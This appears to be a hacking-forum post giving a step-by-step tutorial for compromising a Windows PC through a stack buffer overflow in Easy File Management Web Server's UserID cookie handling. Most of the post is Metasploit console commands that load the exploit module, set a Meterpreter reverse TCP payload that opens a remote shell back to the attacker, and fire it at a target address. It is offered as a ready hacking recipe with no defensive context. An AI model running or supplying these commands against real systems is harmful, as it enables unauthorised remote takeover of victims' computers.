• We just launched and are currently in beta. Join us as we build and grow the community.

Hack Remote Windows PC using Easy File Management Web Server Stack Buffer Overflow

ben2k3456

Process Automator
B Rep
0
0
0
Rep
0
B Vouches
0
0
0
Vouches
0
Posts
114
Likes
25
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 600 XP
Easy File Management Web Server v4.0 and v5.3 contains a stack buffer overflow condition that is triggered as user-supplied input is not properly validated when handling the UserID cookie. This may allow a remote attacker to execute arbitrary code.

Exploit Targets

Easy File Management Web Server v5.3

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

0.png


Now type use exploit/windows/http/efs_fmws_userid_bof

msf exploit (efs_fmws_userid_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (efs_fmws_userid_bof)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (efs_fmws_userid_bof)>set rhost 192.168.1.2 (IP of Remote Host)

msf exploit (efs_fmws_userid_bof)>exploit

1.png


2.png
 

428,436

311,073

311,082

Top